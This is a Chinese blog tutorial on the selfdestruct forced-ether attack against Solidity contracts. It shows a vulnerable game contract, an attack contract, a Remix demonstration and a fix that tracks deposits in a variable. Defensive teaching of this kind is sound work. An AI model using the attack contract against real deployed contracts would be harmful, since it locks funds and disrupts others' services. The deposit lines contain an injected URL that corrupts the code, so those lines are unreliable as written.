id:BSN_2021 公众号:BSN 研习社 作者:红枣科技张雪良
背景:由于公链环境下所有的信息都是共享的,智能合约相当于是完全透明化,任何人都可以调用,外加一些利益的驱动,导致引发了很多hacker的攻击。其中self destruct攻击也是常见的攻击方式之一。前言 在进入正题之前,我先带大家从基础知识点开始一点点深入到怎么攻击以及预防。好,废话不多话,先看下selfdestruct的官方解释:
目标:将目标合约瘫痪掉,无法做正常的业务,从而认识以及预防自毁攻击漏洞。
对象:适用于用Solidity语言开发的智能合约,例如BSN中的武汉链(基于ETH)和泰安链(基于 fisco bcos)上运行的智能合约。
selfdestruct(address payable recipient)
Destroy the current contract, sending its funds to the given Address and end execution
理解起来也很简单,就是说合约销毁的时候,可以把ether转到指定的地址。
常见的用法 : 当我们的合约有漏洞或者业务变更的变化时,需要把它销毁掉,以避免造成更多的影响。此时可以在合约里提供一个销毁方法;
示例如下:
pragma solidity >=0.7.0 <0.9.0;
contract Destructible {
address payable owner;
constructor() {
owner = payable(msg.sender);
}// 销毁合约
function destroy() public {
if (msg.sender == owner){
selfdestruct(owner);
}
}
}
当需要销毁时,合约的owner可以调用
destory()
方法进行合约销毁。那接下来,我们正式进入主题,如何使用self-destory进行攻击。
攻击演示 1. 合约示例
演示需要用到的两个合约,一个模拟业务合约,一个为攻击合约。
业务合约:
一个简单的游戏,每个用户每次可以存放1ether到合约里,等到第7次存放的用户将成为赢家,可以把7ether提到自己账户里。
攻击合约:
编写了一个合约销毁的方法,即本合约销毁时会发送ether到指定的合约。
攻击逻辑:
调用攻击合约的attack方法,使得上述的业务合约余额超过7。
示例如下:
pragma solidity >=0.7.0 <0.9.0;
// 业务合约
contract EtherGame {
uint public targetAmount = 7 ether;
address public winner;
// 充值ether
function deposit() public payable {
require(msg.value =https://www.it610.com/article/= 1 ether,"You can only send 1 Ether");
uint balance = address(this).balance;
require(balance <= targetAmount, "Game is over");
if (balance == targetAmount) {
winner = msg.sender;
}
}
// 提取ether
function claimReward() public {
require(msg.sender == winner, "Not winner");
winner = address(0);
(bool sent, ) = msg.sender.call{value: address(this).balance}("");
require(sent, "Failed to send Ether");
}
// 查询当前余额
function balanceOf() public view returns (uint){
return address(this).balance;
}
}
// 攻击合约
contract Attack {EtherGame etherGame;
constructor(EtherGame _etherGame) {
etherGame = EtherGame(_etherGame);
}// 合约销毁和发送ether
function attack() public payable {
// 发送ether到指定的业务合约
selfdestruct(payable(address(etherGame)));
}}
2. 合约部署
老规矩,我们使用remix进行部署测试。
部署成功后,截图如下:
文章图片
文章图片
3. 正常业务操作
准备两个账户A和B,分别为100ether。
具体操作流程为:A调用5次存放5ether,B调用2次存放2ether,B将成为winner,然后提取7ether。
两个账户合计调用7次后,查询余额以及winner信息,截图如下:
文章图片
B账户提取ether,结果截图如下:
文章图片
文章图片
上面的图中可以看到,B账户成功的提取了合约里的7 ether。
4. 攻击操作
我们还是用上面的两个账户账户A和B。
具体操作流程为:A调用5次存放5ether,B调用攻击合约的attack方法并发送3ether。
文章图片
上图可以发现业务合约当前余额为8 ether。
文章图片
上图可以看到攻击合约的owner变为0x0地址。
到此,业务合约已被攻击,即业务无法正常进行,不能存放以及提取。
下面,我们进行测试depoit和claimReward的方法调用,结果信息截图如下:
文章图片
解决方案 最后,给大家推荐一个常用的方案:将全局address(this).balance改为变量统计进入deposit逻辑的ether数量。
最终代码如下所示:
pragma solidity >=0.7.0 <0.9.0;
// 业务合约
contract EtherGame {
uint public targetAmount = 7 ether;
address public winner;
uint public balance;
// 记录ether数量
// 充值ether
function deposit() public payable {
require(msg.value =https://www.it610.com/article/= 1 ether,"You can only send 1 Ether");
balance += msg.value;
require(balance <= targetAmount, "Game is over");
if (balance == targetAmount) {
winner = msg.sender;
}
}
// 提取ether
function claimReward() public {
require(msg.sender == winner, "Not winner");
winner = address(0);
(bool sent, ) = msg.sender.call{value: balance}("");
require(sent, "Failed to send Ether");
}
// 查询当前余额
function balanceOf() public view returns (uint){
return address(this).balance;
}
}
今天的讲解到此结束,感谢大家的阅读,如果你有其他的想法或者建议,欢迎一块交流。
【区块链合约安全系列(三)(如何认识及预防公链合约中的自毁攻击)】本文由mdnice多平台发布
推荐阅读
- Java Agent 踩坑之 appendToSystemClassLoaderSearch 问题
- python|python篇 习题(循环语句)
- 基础面试题
- C++|C++快速入门(上)
- 提名 Apache ShardingSphere Committer,说说方法
- 程序员|Java详解(如何实现一个-redis-缓存服务,牛客视频面试)
- c语言学习|c语言深入浅出,玩爆常见字符串,内存操作库函数(爆肝最长时间之作)
- 6000字干货分享(数据中台项目管理实践分享)
- java|35个小妙招优化Java性能——精简篇